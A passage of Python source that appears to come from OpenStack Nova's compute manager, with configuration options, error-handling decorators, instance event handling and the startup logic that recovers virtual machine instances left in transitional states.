help='Maximum number of instance builds to run concurrently'),
cfg.IntOpt('block_device_allocate_retries',
default=60,
help='Number of times to retry block device'
' allocation on failures')
]
interval_opts = [
cfg.IntOpt('bandwidth_poll_interval',
default=600,
help='Interval to pull network bandwidth usage info. Not '
'supported on all hypervisors. Set to -1 to disable. '
'Setting this to 0 will run at the default rate.'),
cfg.IntOpt('sync_power_state_interval',
default=600,
help='Interval to sync power states between the database and '
'the hypervisor. Set to -1 to disable. '
'Setting this to 0 will run at the default rate.'),
cfg.IntOpt("heal_instance_info_cache_interval",
default=60,
help="Number of seconds between instance network information "
"cache updates"),
cfg.IntOpt('reclaim_instance_interval',
default=0,
help='Interval in seconds for reclaiming deleted instances'),
cfg.IntOpt('volume_usage_poll_interval',
default=0,
help='Interval in seconds for gathering volume usages'),
cfg.IntOpt('shelved_poll_interval',
default=3600,
help='Interval in seconds for polling shelved instances to '
'offload. Set to -1 to disable. '
'Setting this to 0 will run at the default rate.'),
cfg.IntOpt('shelved_offload_time',
default=0,
help='Time in seconds before a shelved instance is eligible '
'for removing from a host. -1 never offload, 0 offload '
'immediately when shelved'),
cfg.IntOpt('instance_delete_interval',
default=300,
help='Interval in seconds for retrying failed instance file '
'deletes. Set to -1 to disable. '
'Setting this to 0 will run at the default rate.'),
cfg.IntOpt('block_device_allocate_retries_interval',
default=3,
help='Waiting time interval (seconds) between block'
' device allocation retries on failures'),
cfg.IntOpt('scheduler_instance_sync_interval',
default=120,
help='Waiting time interval (seconds) between sending the '
'scheduler a list of current instance UUIDs to verify '
'that its view of instances is in sync with nova. If the '
'CONF option `scheduler_tracks_instance_changes` is '
'False, changing this option will have no effect.'),
]
timeout_opts = [
cfg.IntOpt("reboot_timeout",
default=0,
help="Automatically hard reboot an instance if it has been "
"stuck in a rebooting state longer than N seconds. "
"Set to 0 to disable."),
cfg.IntOpt("instance_build_timeout",
default=0,
help="Amount of time in seconds an instance can be in BUILD "
"before going into ERROR status. "
"Set to 0 to disable."),
cfg.IntOpt("rescue_timeout",
default=0,
help="Automatically unrescue an instance after N seconds. "
"Set to 0 to disable."),
cfg.IntOpt("resize_confirm_window",
default=0,
help="Automatically confirm resizes after N seconds. "
"Set to 0 to disable."),
cfg.IntOpt("shutdown_timeout",
default=60,
help="Total amount of time to wait in seconds for an instance "
"to perform a clean shutdown."),
]
running_deleted_opts = [
cfg.StrOpt("running_deleted_instance_action",
default="reap",
help="Action to take if a running deleted instance is detected."
" Valid options are 'noop', 'log', 'shutdown', or 'reap'. "
"Set to 'noop' to take no action."),
cfg.IntOpt("running_deleted_instance_poll_interval",
default=1800,
help="Number of seconds to wait between runs of the cleanup "
"task."),
cfg.IntOpt("running_deleted_instance_timeout",
default=0,
help="Number of seconds after being deleted when a running "
"instance should be considered eligible for cleanup."),
]
instance_cleaning_opts = [
cfg.IntOpt('maximum_instance_delete_attempts',
default=5,
help='The number of times to attempt to reap an instance\'s '
'files.'),
]
CONF = cfg.CONF
CONF.register_opts(compute_opts)
CONF.register_opts(interval_opts)
CONF.register_opts(timeout_opts)
CONF.register_opts(running_deleted_opts)
CONF.register_opts(instance_cleaning_opts)
CONF.import_opt('allow_resize_to_same_host', 'nova.compute.api')
CONF.import_opt('console_topic', 'nova.console.rpcapi')
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('my_ip', 'nova.netconf')
CONF.import_opt('vnc_enabled', 'nova.vnc')
CONF.import_opt('enabled', 'nova.spice', group='spice')
CONF.import_opt('enable', 'nova.cells.opts', group='cells')
CONF.import_opt('image_cache_manager_interval', 'nova.virt.imagecache')
CONF.import_opt('enabled', 'nova.rdp', group='rdp')
CONF.import_opt('html5_proxy_base_url', 'nova.rdp', group='rdp')
CONF.import_opt('enabled', 'nova.console.serial', group='serial_console')
CONF.import_opt('base_url', 'nova.console.serial', group='serial_console')
CONF.import_opt('destroy_after_evacuate', 'nova.utils', group='workarounds')
CONF.import_opt('scheduler_tracks_instance_changes',
'nova.scheduler.host_manager')
CONF.import_opt('vrde_password_length',
'nova.virt.virtualbox.consoleops', group='virtualbox')
CONF.import_opt('vrde_require_instance_uuid_as_password',
'nova.virt.virtualbox.consoleops', group='virtualbox')
LOG = logging.getLogger(__name__)
get_notifier = functools.partial(rpc.get_notifier, service='compute')
wrap_exception = functools.partial(exception.wrap_exception,
get_notifier=get_notifier)
@utils.expects_func_args('migration')
def errors_out_migration(function):
"""Decorator to error out migration on failure."""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
try:
return function(self, context, *args, **kwargs)
except Exception as ex:
with excutils.save_and_reraise_exception():
wrapped_func = utils.get_wrapped_function(function)
keyed_args = safe_utils.getcallargs(wrapped_func, context,
*args, **kwargs)
migration = keyed_args['migration']
# NOTE(rajesht): If InstanceNotFound error is thrown from
# decorated function, migration status should be set to
# 'error', without checking current migration status.
if not isinstance(ex, exception.InstanceNotFound):
status = migration.status
if status not in ['migrating', 'post-migrating']:
return
migration.status = 'error'
try:
with migration.obj_as_admin():
migration.save()
except Exception:
LOG.debug('Error setting migration status '
'for instance %s.',
migration.instance_uuid, exc_info=True)
return decorated_function
@utils.expects_func_args('instance')
def reverts_task_state(function):
"""Decorator to revert task_state on failure."""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
try:
return function(self, context, *args, **kwargs)
except exception.UnexpectedTaskStateError as e:
# Note(maoy): unexpected task state means the current
# task is preempted. Do not clear task state in this
# case.
with excutils.save_and_reraise_exception():
LOG.info(_LI("Task possibly preempted: %s"),
e.format_message())
except Exception:
with excutils.save_and_reraise_exception():
wrapped_func = utils.get_wrapped_function(function)
keyed_args = safe_utils.getcallargs(wrapped_func, context,
*args, **kwargs)
# NOTE(mriedem): 'instance' must be in keyed_args because we
# have utils.expects_func_args('instance') decorating this
# method.
instance_uuid = keyed_args['instance']['uuid']
try:
self._instance_update(context,
instance_uuid,
task_state=None)
except exception.InstanceNotFound:
# We might delete an instance that failed to build shortly
# after it errored out; this is an expected case and we
# should not trace on it.
pass
except Exception as e:
msg = _LW("Failed to revert task state for instance. "
"Error: %s")
LOG.warning(msg, e, instance_uuid=instance_uuid)
return decorated_function
@utils.expects_func_args('instance')
def wrap_instance_fault(function):
"""Wraps a method to catch exceptions related to instances.
This decorator wraps a method to catch any exceptions having to do with
an instance that may get thrown. It then logs an instance fault in the db.
"""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
try:
return function(self, context, *args, **kwargs)
except exception.InstanceNotFound:
raise
except Exception as e:
# NOTE(gtt): If argument 'instance' is in args rather than kwargs,
# we will get a KeyError exception which will cover up the real
# exception. So, we update kwargs with the values from args first.
# then, we can get 'instance' from kwargs easily.
kwargs.update(dict(zip(function.func_code.co_varnames[2:], args)))
with excutils.save_and_reraise_exception():
compute_utils.add_instance_fault_from_exc(context,
kwargs['instance'], e, sys.exc_info())
return decorated_function
@utils.expects_func_args('instance')
def wrap_instance_event(function):
"""Wraps a method to log the event taken on the instance, and result.
This decorator wraps a method to log the start and result of an event, as
part of an action taken on an instance.
"""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
wrapped_func = utils.get_wrapped_function(function)
keyed_args = safe_utils.getcallargs(wrapped_func, context, *args,
**kwargs)
instance_uuid = keyed_args['instance']['uuid']
event_name = 'compute_{0}'.format(function.func_name)
with compute_utils.EventReporter(context, event_name, instance_uuid):
return function(self, context, *args, **kwargs)
return decorated_function
@utils.expects_func_args('image_id', 'instance')
def delete_image_on_error(function):
"""Used for snapshot related method to ensure the image created in
compute.api is deleted when an error occurs.
"""
@functools.wraps(function)
def decorated_function(self, context, image_id, instance,
*args, **kwargs):
try:
return function(self, context, image_id, instance,
*args, **kwargs)
except Exception:
with excutils.save_and_reraise_exception():
LOG.debug("Cleaning up image %s", image_id,
exc_info=True, instance=instance)
try:
self.image_api.delete(context, image_id)
except Exception:
LOG.exception(_LE("Error while trying to clean up "
"image %s"), image_id,
instance=instance)
return decorated_function
# TODO(danms): Remove me after Icehouse
# NOTE(mikal): if the method being decorated has more than one decorator, then
# put this one first. Otherwise the various exception handling decorators do
# not function correctly.
def object_compat(function):
"""Wraps a method that expects a new-world instance
This provides compatibility for callers passing old-style dict
instances.
"""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
def _load_instance(instance_or_dict):
if isinstance(instance_or_dict, dict):
# try to get metadata and system_metadata for most cases but
# only attempt to load those if the db instance already has
# those fields joined
metas = [meta for meta in ('metadata', 'system_metadata')
if meta in instance_or_dict]
instance = objects.Instance._from_db_object(
context, objects.Instance(), instance_or_dict,
expected_attrs=metas)
instance._context = context
return instance
return instance_or_dict
try:
kwargs['instance'] = _load_instance(kwargs['instance'])
except KeyError:
args = (_load_instance(args[0]),) + args[1:]
migration = kwargs.get('migration')
if isinstance(migration, dict):
migration = objects.Migration._from_db_object(
context.elevated(), objects.Migration(),
migration)
kwargs['migration'] = migration
return function(self, context, *args, **kwargs)
return decorated_function
# TODO(danms): Remove me after Icehouse
def aggregate_object_compat(function):
"""Wraps a method that expects a new-world aggregate."""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
aggregate = kwargs.get('aggregate')
if isinstance(aggregate, dict):
aggregate = objects.Aggregate._from_db_object(
context.elevated(), objects.Aggregate(),
aggregate)
kwargs['aggregate'] = aggregate
return function(self, context, *args, **kwargs)
return decorated_function
class InstanceEvents(object):
def __init__(self):
self._events = {}
@staticmethod
def _lock_name(instance):
return '%s-%s' % (instance.uuid, 'events')
def prepare_for_instance_event(self, instance, event_name):
"""Prepare to receive an event for an instance.
This will register an event for the given instance that we will
wait on later. This should be called before initiating whatever
action will trigger the event. The resulting eventlet.event.Event
object should be wait()'d on to ensure completion.
:param instance: the instance for which the event will be generated
:param event_name: the name of the event we're expecting
:returns: an event object that should be wait()'d on
"""
if self._events is None:
# NOTE(danms): We really should have a more specific error
# here, but this is what we use for our default error case
raise exception.NovaException('In shutdown, no new events '
'can be scheduled')
@utils.synchronized(self._lock_name(instance))
def _create_or_get_event():
if instance.uuid not in self._events:
self._events.setdefault(instance.uuid, {})
return self._events[instance.uuid].setdefault(
event_name, eventlet.event.Event())
LOG.debug('Preparing to wait for external event %(event)s',
{'event': event_name}, instance=instance)
return _create_or_get_event()
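# Illustrative call pattern for the method above (hypothetical caller code, not
# part of this class):
#   event = instance_events.prepare_for_instance_event(
#       instance, 'network-vif-plugged-<vif_id>')
#   ...start the action that will emit the external event...
#   event.wait()  # unblocked once pop_instance_event() sends the result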
def pop_instance_event(self, instance, event):
"""Remove a pending event from the wait list.
This will remove a pending event from the wait list so that it
can be used to signal the waiters to wake up.
:param instance: the instance for which the event was generated
:param event: the nova.objects.external_event.InstanceExternalEvent
that describes the event
:returns: the eventlet.event.Event object on which the waiters
are blocked
"""
no_events_sentinel = object()
no_matching_event_sentinel = object()
@utils.synchronized(self._lock_name(instance))
def _pop_event():
if not self._events:
LOG.debug('Unexpected attempt to pop events during shutdown',
instance=instance)
return no_events_sentinel
events = self._events.get(instance.uuid)
if not events:
return no_events_sentinel
_event = events.pop(event.key, None)
if not events:
del self._events[instance.uuid]
if _event is None:
return no_matching_event_sentinel
return _event
result = _pop_event()
if result is no_events_sentinel:
LOG.debug('No waiting events found dispatching %(event)s',
{'event': event.key},
instance=instance)
return None
elif result is no_matching_event_sentinel:
LOG.debug('No event matching %(event)s in %(events)s',
{'event': event.key,
'events': self._events.get(instance.uuid, {}).keys()},
instance=instance)
return None
else:
return result
def clear_events_for_instance(self, instance):
"""Remove all pending events for an instance.
This will remove all events currently pending for an instance
and return them (indexed by event name).
:param instance: the instance for which events should be purged
:returns: a dictionary of {event_name: eventlet.event.Event}
"""
@utils.synchronized(self._lock_name(instance))
def _clear_events():
if self._events is None:
LOG.debug('Unexpected attempt to clear events during shutdown',
instance=instance)
return dict()
return self._events.pop(instance.uuid, {})
return _clear_events()
def cancel_all_events(self):
our_events = self._events
# NOTE(danms): Block new events
self._events = None
for instance_uuid, events in our_events.items():
for event_name, eventlet_event in events.items():
LOG.debug('Canceling in-flight event %(event)s for '
'instance %(instance_uuid)s',
{'event': event_name,
'instance_uuid': instance_uuid})
name, tag = event_name.split('-', 1)
event = objects.InstanceExternalEvent(
instance_uuid=instance_uuid,
name=name, status='failed',
tag=tag, data={})
eventlet_event.send(event)
class ComputeVirtAPI(virtapi.VirtAPI):
def __init__(self, compute):
super(ComputeVirtAPI, self).__init__()
self._compute = compute
def provider_fw_rule_get_all(self, context):
return self._compute.conductor_api.provider_fw_rule_get_all(context)
def _default_error_callback(self, event_name, instance):
raise exception.NovaException(_('Instance event failed'))
@contextlib.contextmanager
def wait_for_instance_event(self, instance, event_names, deadline=300,
error_callback=None):
"""Plan to wait for some events, run some code, then wait.
This context manager will first create plans to wait for the
provided event_names, yield, and then wait for all the scheduled
events to complete.
Note that this uses an eventlet.timeout.Timeout to bound the
operation, so callers should be prepared to catch that
failure and handle that situation appropriately.
If the event is not received by the specified timeout deadline,
eventlet.timeout.Timeout is raised.
If the event is received but did not have a 'completed'
status, a NovaException is raised. If an error_callback is
provided, instead of raising an exception as detailed above
for the failure case, the callback will be called with the
event_name and instance, and can return True to continue
waiting for the rest of the events, False to stop processing,
or raise an exception which will bubble up to the waiter.
:param instance: The instance for which an event is expected
:param event_names: A list of event names. Each element can be a
string event name or tuple of strings to
indicate (name, tag).
:param deadline: Maximum number of seconds we should wait for all
of the specified events to arrive.
:param error_callback: A function to be called if an event arrives
"""
if error_callback is None:
error_callback = self._default_error_callback
events = {}
for event_name in event_names:
if isinstance(event_name, tuple):
name, tag = event_name
event_name = objects.InstanceExternalEvent.make_key(
name, tag)
try:
events[event_name] = (
self._compute.instance_events.prepare_for_instance_event(
instance, event_name))
except exception.NovaException:
error_callback(event_name, instance)
# NOTE(danms): Don't wait for any of the events. They
# should all be canceled and fired immediately below,
# but don't stick around if not.
deadline = 0
yield
with eventlet.timeout.Timeout(deadline):
for event_name, event in events.items():
actual_event = event.wait()
if actual_event.status == 'completed':
continue
decision = error_callback(event_name, instance)
if decision is False:
break
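# Illustrative sketch of how a virt driver is expected to use the context
# manager above (hypothetical event tag, not part of this class):
#   with virtapi.wait_for_instance_event(
#           instance, [('network-vif-plugged', vif_id)], deadline=300):
#       plug_vifs()  # the work that eventually triggers the external event
#   # leaving the with-block waits for the event or raises
#   # eventlet.timeout.Timeout if the deadline passes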
class ComputeManager(manager.Manager):
"""Manages the running instances from creation to destruction."""
target = messaging.Target(version='3.40')
# How long to wait in seconds before re-issuing a shutdown
# signal to an instance during power off. The overall
# time to wait is set by CONF.shutdown_timeout.
SHUTDOWN_RETRY_INTERVAL = 10
def __init__(self, compute_driver=None, *args, **kwargs):
"""Load configuration options and connect to the hypervisor."""
self.virtapi = ComputeVirtAPI(self)
self.network_api = network.API()
self.volume_api = volume.API()
self.image_api = image.API()
self._last_host_check = 0
self._last_bw_usage_poll = 0
self._bw_usage_supported = True
self._last_bw_usage_cell_update = 0
self.compute_api = compute.API()
self.compute_rpcapi = compute_rpcapi.ComputeAPI()
self.conductor_api = conductor.API()
self.compute_task_api = conductor.ComputeTaskAPI()
self.is_neutron_security_groups = (
openstack_driver.is_neutron_security_groups())
self.consoleauth_rpcapi = consoleauth.rpcapi.ConsoleAuthAPI()
self.cells_rpcapi = cells_rpcapi.CellsAPI()
self.scheduler_rpcapi = scheduler_rpcapi.SchedulerAPI()
self.scheduler_client = scheduler_client.SchedulerClient()
self._resource_tracker_dict = {}
self.instance_events = InstanceEvents()
self._sync_power_pool = eventlet.GreenPool()
self._syncs_in_progress = {}
self.send_instance_updates = CONF.scheduler_tracks_instance_changes
if CONF.max_concurrent_builds != 0:
self._build_semaphore = eventlet.semaphore.Semaphore(
CONF.max_concurrent_builds)
else:
self._build_semaphore = compute_utils.UnlimitedSemaphore()
super(ComputeManager, self).__init__(service_name="compute",
*args, **kwargs)
self.additional_endpoints.append(_ComputeV4Proxy(self))
# NOTE(russellb) Load the driver last. It may call back into the
# compute manager via the virtapi, so we want it to be fully
# initialized before that happens.
self.driver = driver.load_compute_driver(self.virtapi, compute_driver)
self.use_legacy_block_device_info = \
self.driver.need_legacy_block_device_info
def _get_resource_tracker(self, nodename):
rt = self._resource_tracker_dict.get(nodename)
if not rt:
if not self.driver.node_is_available(nodename):
raise exception.NovaException(
_("%s is not a valid node managed by this "
"compute host.") % nodename)
rt = resource_tracker.ResourceTracker(self.host,
self.driver,
nodename)
self._resource_tracker_dict[nodename] = rt
return rt
def _update_resource_tracker(self, context, instance):
"""Let the resource tracker know that an instance has changed state."""
if (instance['host'] == self.host and
self.driver.node_is_available(instance['node'])):
rt = self._get_resource_tracker(instance.get('node'))
rt.update_usage(context, instance)
def _instance_update(self, context, instance_uuid, **kwargs):
"""Update an instance in the database using kwargs as value."""
instance_ref = self.conductor_api.instance_update(context,
instance_uuid,
**kwargs)
self._update_resource_tracker(context, instance_ref)
return instance_ref
def _set_instance_error_state(self, context, instance):
instance_uuid = instance.uuid
try:
self._instance_update(context, instance_uuid,
vm_state=vm_states.ERROR)
except exception.InstanceNotFound:
LOG.debug('Instance has been destroyed from under us while '
'trying to set it to ERROR',
instance_uuid=instance_uuid)
def _set_instance_obj_error_state(self, context, instance):
try:
instance.vm_state = vm_states.ERROR
instance.save()
except exception.InstanceNotFound:
LOG.debug('Instance has been destroyed from under us while '
'trying to set it to ERROR', instance=instance)
def _get_instances_on_driver(self, context, filters=None):
"""Return a list of instance records for the instances found
on the hypervisor which satisfy the specified filters. If filters=None
return a list of instance records for all the instances found on the
hypervisor.
"""
if not filters:
filters = {}
try:
driver_uuids = self.driver.list_instance_uuids()
if len(driver_uuids) == 0:
# Short circuit, don't waste a DB call
return objects.InstanceList()
filters['uuid'] = driver_uuids
local_instances = objects.InstanceList.get_by_filters(
context, filters, use_slave=True)
return local_instances
except NotImplementedError:
pass
# The driver doesn't support uuids listing, so we'll have
# to brute force.
driver_instances = self.driver.list_instances()
instances = objects.InstanceList.get_by_filters(context, filters,
use_slave=True)
name_map = {instance.name: instance for instance in instances}
local_instances = []
for driver_instance in driver_instances:
instance = name_map.get(driver_instance)
if not instance:
continue
local_instances.append(instance)
return local_instances
def _destroy_evacuated_instances(self, context):
"""Destroys evacuated instances.
While nova-compute was down, the instances running on it could be
evacuated to another host. Check that the instances reported
by the driver are still associated with this host. If they are
not, destroy them, with the exception of instances which are in
the MIGRATING, RESIZE_MIGRATING, RESIZE_MIGRATED, RESIZE_FINISH
task state or RESIZED vm state.
"""
our_host = self.host
filters = {'deleted': False}
local_instances = self._get_instances_on_driver(context, filters)
for instance in local_instances:
if instance.host != our_host:
if (instance.task_state in [task_states.MIGRATING,
task_states.RESIZE_MIGRATING,
task_states.RESIZE_MIGRATED,
task_states.RESIZE_FINISH]
or instance.vm_state in [vm_states.RESIZED]):
LOG.debug('Will not delete instance as its host ('
'%(instance_host)s) is not equal to our '
'host (%(our_host)s) but its task state is '
'(%(task_state)s) and vm state is '
'(%(vm_state)s)',
{'instance_host': instance.host,
'our_host': our_host,
'task_state': instance.task_state,
'vm_state': instance.vm_state},
instance=instance)
continue
if not CONF.workarounds.destroy_after_evacuate:
LOG.warning(_LW('Instance %(uuid)s appears to have been '
'evacuated from this host to %(host)s. '
'Not destroying it locally due to '
'config setting '
'"workarounds.destroy_after_evacuate". '
'If this is not correct, enable that '
'option and restart nova-compute.'),
{'uuid': instance.uuid,
'host': instance.host})
continue
LOG.info(_LI('Deleting instance as its host ('
'%(instance_host)s) is not equal to our '
'host (%(our_host)s).'),
{'instance_host': instance.host,
'our_host': our_host}, instance=instance)
try:
network_info = self._get_instance_nw_info(context,
instance)
bdi = self._get_instance_block_device_info(context,
instance)
destroy_disks = not (self._is_instance_storage_shared(
context, instance))
except exception.InstanceNotFound:
network_info = network_model.NetworkInfo()
bdi = {}
LOG.info(_LI('Instance has been marked deleted already, '
'removing it from the hypervisor.'),
instance=instance)
# always destroy disks if the instance was deleted
destroy_disks = True
self.driver.destroy(context, instance,
network_info,
bdi, destroy_disks)
def _is_instance_storage_shared(self, context, instance, host=None):
shared_storage = True
data = None
try:
data = self.driver.check_instance_shared_storage_local(context,
instance)
if data:
shared_storage = (self.compute_rpcapi.
check_instance_shared_storage(context,
instance, data, host=host))
except NotImplementedError:
LOG.warning(_LW('Hypervisor driver does not support '
'instance shared storage check, '
'assuming it\'s not on shared storage'),
instance=instance)
shared_storage = False
except Exception:
LOG.exception(_LE('Failed to check if instance shared'),
instance=instance)
finally:
if data:
self.driver.check_instance_shared_storage_cleanup(context,
data)
return shared_storage
def _complete_partial_deletion(self, context, instance):
"""Complete deletion for instances in DELETED status but not marked as
deleted in the DB
"""
system_meta = instance.system_metadata
instance.destroy()
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
quotas = objects.Quotas(context=context)
project_id, user_id = objects.quotas.ids_from_instance(context,
instance)
quotas.reserve(project_id=project_id, user_id=user_id, instances=-1,
cores=-instance.vcpus, ram=-instance.memory_mb)
self._complete_deletion(context,
instance,
bdms,
quotas,
system_meta)
def _complete_deletion(self, context, instance, bdms,
quotas, system_meta):
if quotas:
quotas.commit()
# ensure block device mappings are not leaked
for bdm in bdms:
bdm.destroy()
self._notify_about_instance_usage(context, instance, "delete.end",
system_metadata=system_meta)
if CONF.vnc_enabled or CONF.spice.enabled:
if CONF.cells.enable:
self.cells_rpcapi.consoleauth_delete_tokens(context,
instance.uuid)
else:
self.consoleauth_rpcapi.delete_tokens_for_instance(context,
instance.uuid)
self._delete_scheduler_instance_info(context, instance.uuid)
def _create_reservations(self, context, instance, project_id, user_id):
vcpus = instance.vcpus
mem_mb = instance.memory_mb
quotas = objects.Quotas(context=context)
quotas.reserve(project_id=project_id,
user_id=user_id,
instances=-1,
cores=-vcpus,
ram=-mem_mb)
return quotas
def _init_instance(self, context, instance):
'''Initialize this instance during service init.'''
# NOTE(danms): If the instance appears to not be owned by this
# host, it may have been evacuated away, but skipped by the
# evacuation cleanup code due to configuration. Thus, if that
# is a possibility, don't touch the instance in any way, but
# log the concern. This will help avoid potential issues on
# startup due to misconfiguration.
if instance.host != self.host:
LOG.warning(_LW('Instance %(uuid)s appears to not be owned '
'by this host, but by %(host)s. Startup '
'processing is being skipped.'),
{'uuid': instance.uuid,
'host': instance.host})
return
# Instances that are shut down or in an error state cannot be
# initialized and are not attempted to be recovered. The exception
# to this are instances that are in RESIZE_MIGRATING or DELETING,
# which are dealt with further down.
if (instance.vm_state == vm_states.SOFT_DELETED or
(instance.vm_state == vm_states.ERROR and
instance.task_state not in
(task_states.RESIZE_MIGRATING, task_states.DELETING))):
LOG.debug("Instance is in %s state.",
instance.vm_state, instance=instance)
return
if instance.vm_state == vm_states.DELETED:
try:
self._complete_partial_deletion(context, instance)
except Exception:
# we don't want an exception to block the init_host
msg = _LE('Failed to complete a deletion')
LOG.exception(msg, instance=instance)
return
if (instance.vm_state == vm_states.BUILDING or
instance.task_state in [task_states.SCHEDULING,
task_states.BLOCK_DEVICE_MAPPING,
task_states.NETWORKING,
task_states.SPAWNING]):
# NOTE(dave-mcnally) compute stopped before instance was fully
# spawned so set to ERROR state. This is safe to do as the state
# may be set by the api but the host is not, so if we get here the
# instance has already been scheduled to this particular host.
LOG.debug("Instance failed to spawn correctly, "
"setting to ERROR state", instance=instance)
instance.task_state = None
instance.vm_state = vm_states.ERROR
instance.save()
return
if (instance.vm_state in [vm_states.ACTIVE, vm_states.STOPPED] and
instance.task_state in [task_states.REBUILDING,
task_states.REBUILD_BLOCK_DEVICE_MAPPING,
task_states.REBUILD_SPAWNING]):
# NOTE(jichenjc) compute stopped before instance was fully
# spawned so set to ERROR state. This is consistent with the BUILD case
LOG.debug("Instance failed to rebuild correctly, "
"setting to ERROR state", instance=instance)
instance.task_state = None
instance.vm_state = vm_states.ERROR
instance.save()
return
if (instance.vm_state != vm_states.ERROR and
instance.task_state in [task_states.IMAGE_SNAPSHOT_PENDING,
task_states.IMAGE_PENDING_UPLOAD,
task_states.IMAGE_UPLOADING,
task_states.IMAGE_SNAPSHOT]):
LOG.debug("Instance in transitional state %s at start-up "
"clearing task state",
instance.task_state, instance=instance)
try:
self._post_interrupted_snapshot_cleanup(context, instance)
except Exception:
# we don't want an exception to block the init_host
msg = _LE('Failed to cleanup snapshot.')
LOG.exception(msg, instance=instance)
instance.task_state = None
instance.save()
if (instance.vm_state != vm_states.ERROR and
instance.task_state in [task_states.RESIZE_PREP]):
LOG.debug("Instance in transitional state %s at start-up "
"clearing task state",
instance['task_state'], instance=instance)
instance.task_state = None
instance.save()
if instance.task_state == task_states.DELETING:
try:
LOG.info(_LI('Service started deleting the instance during '
'the previous run, but did not finish. Restarting'
' the deletion now.'), instance=instance)
instance.obj_load_attr('metadata')
instance.obj_load_attr('system_metadata')
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
project_id, user_id = objects.quotas.ids_from_instance(
context, instance)
quotas = self._create_reservations(context, instance,
project_id, user_id)
self._delete_instance(context, instance, bdms, quotas)
except Exception:
# we don't want an exception to block the init_host
msg = _LE('Failed to complete a deletion')
LOG.exception(msg, instance=instance)
self._set_instance_error_state(context, instance)
return
try_reboot, reboot_type = self._retry_reboot(context, instance)
current_power_state = self._get_power_state(context, instance)
if try_reboot:
LOG.debug("Instance in transitional state (%(task_state)s) at "
"start-up and power state is (%(power_state)s), "
"triggering reboot",
{'task_state': instance.task_state,
'power_state': current_power_state},
instance=instance)
self.compute_rpcapi.reboot_instance(context, instance,
block_device_info=None,
reboot_type=reboot_type)
return
elif (current_power_state == power_state.RUNNING and
instance.task_state in [task_states.REBOOT_STARTED,
task_states.REBOOT_STARTED_HARD,
task_states.PAUSING,
task_states.UNPAUSING]):
LOG.warning(_LW("Instance in transitional state "
"(%(task_state)s) at start-up and power state "
"is (%(power_state)s), clearing task state"),
{'task_state': instance.task_state,
'power_state': current_power_state},
instance=instance)
instance.task_state = None
instance.vm_state = vm_states.ACTIVE
instance.save()
elif (current_power_state == power_state.PAUSED and
instance.task_state == task_states.UNPAUSING):
LOG.warning(_LW("Instance in transitional state "
"(%(task_state)s) at start-up and power state "
"is (%(power_state)s), clearing task state "
"and unpausing the instance"),
{'task_state': instance.task_state,
'power_state': current_power_state},
instance=instance)
try:
self.unpause_instance(context, instance)
except NotImplementedError:
# Some virt drivers don't support pause and unpause
pass
except Exception:
LOG.exception(_LE('Failed to unpause instance'),
instance=instance)
return
if instance.task_state == task_states.POWERING_OFF:
try:
LOG.debug("Instance in transitional state %s at start-up "
"retrying stop request",
instance.task_state, instance=instance)
self.stop_instance(context, instance)
except Exception:
# we don't want an exception to block the init_host
msg = _LE('Failed to stop instance')
LOG.exception(msg, instance=instance)
return
if instance.task_state == task_states.POWERING_ON:
try:
LOG.debug("Instance in transitional state %s at start-up "
"retrying start request",
instance.task_state, instance=instance)
self.start_instance(context, instance)
except Exception:
# we don't want an exception to block the init_host
msg = _LE('Failed to start instance')
LOG.exception(msg, instance=instance)
return
net_info = compute_utils.get_nw_info_for_instance(instance)
try:
self.driver.plug_vifs(instance, net_info)
except NotImplementedError as e:
LOG.debug(e, instance=instance)
except exception.VirtualInterfacePlugException:
# we don't want an exception to block the init_host
LOG.exception(_LE("Vifs plug failed"), instance=instance)
self._set_instance_error_state(context, instance)
return
if instance.task_state == task_states.RESIZE_MIGRATING:
# We crashed during resize/migration, so roll back for safety
try:
# NOTE(mriedem): check old_vm_state for STOPPED here, if it's
# not in system_metadata we default to True for backwards
# compatibility
power_on = (instance.system_metadata.get('old_vm_state') !=
vm_states.STOPPED)
block_dev_info = self._get_instance_block_device_info(context,
instance)
self.driver.finish_revert_migration(context,
instance, net_info, block_dev_info, power_on)
except Exception:
LOG.exception(_LE('Failed to revert crashed migration'),
instance=instance)
finally:
LOG.info(_LI('Instance found in migrating state during '
'startup. Resetting task_state'),
instance=instance)
instance.task_state = None
instance.save()
if instance.task_state == task_states.MIGRATING:
# Live migration did not complete, but instance is on this
# host, so reset the state.
instance.task_state = None
instance.save(expected_task_state=[task_states.MIGRATING])
db_state = instance.power_state
drv_state = self._get_power_state(context, instance)
expect_running = (db_state == power_state.RUNNING and
drv_state != db_state)
LOG.debug('Current state is %(drv_state)s, state in DB is '
'%(db_state)s.',
{'drv_state': drv_state, 'db_state': db_state},
instance=instance)
if expect_running and CONF.resume_guests_state_on_host_boot:
LOG.info(_LI('Rebooting instance after nova-compute restart.'),
instance=instance)
block_device_info = \
self._get_instance_block_device_info(context, instance)
try:
self.driver.resume_state_on_host_boot(
context, instance, net_info, block_device_info)
except NotImplementedError:
LOG.warning(_LW('Hypervisor driver does not support '
'resume guests'), instance=instance)
except Exception:
# NOTE(vish): The instance failed to resume, so we set the
# instance to error and attempt to continue.
LOG.warning(_LW('Failed to resume instance'),
instance=instance)
self._set_instance_error_state(context, instance)
elif drv_state == power_state.RUNNING:
# VMwareAPI drivers will raise an exception
try:
self.driver.ensure_filtering_rules_for_instance(
instance, net_info)
except NotImplementedError:
LOG.warning(_LW('Hypervisor driver does not support '
'firewall rules'), instance=instance)
def _retry_reboot(self, context, instance):
current_power_state = self._get_power_state(context, instance)
current_task_state = instance.task_state
retry_reboot = False
reboot_type = compute_utils.get_reboot_type(current_task_state,
current_power_state)
pending_soft = (current_task_state == task_states.REBOOT_PENDING and
instance.vm_state in vm_states.ALLOW_SOFT_REBOOT)
pending_hard = (current_task_state == task_states.REBOOT_PENDING_HARD
and instance.vm_state in vm_states.ALLOW_HARD_REBOOT)
started_not_running = (current_task_state in
[task_states.REBOOT_STARTED,
task_states.REBOOT_STARTED_HARD] and
current_power_state != power_state.RUNNING)
if pending_soft or pending_hard or started_not_running:
retry_reboot = True
return retry_reboot, reboot_type
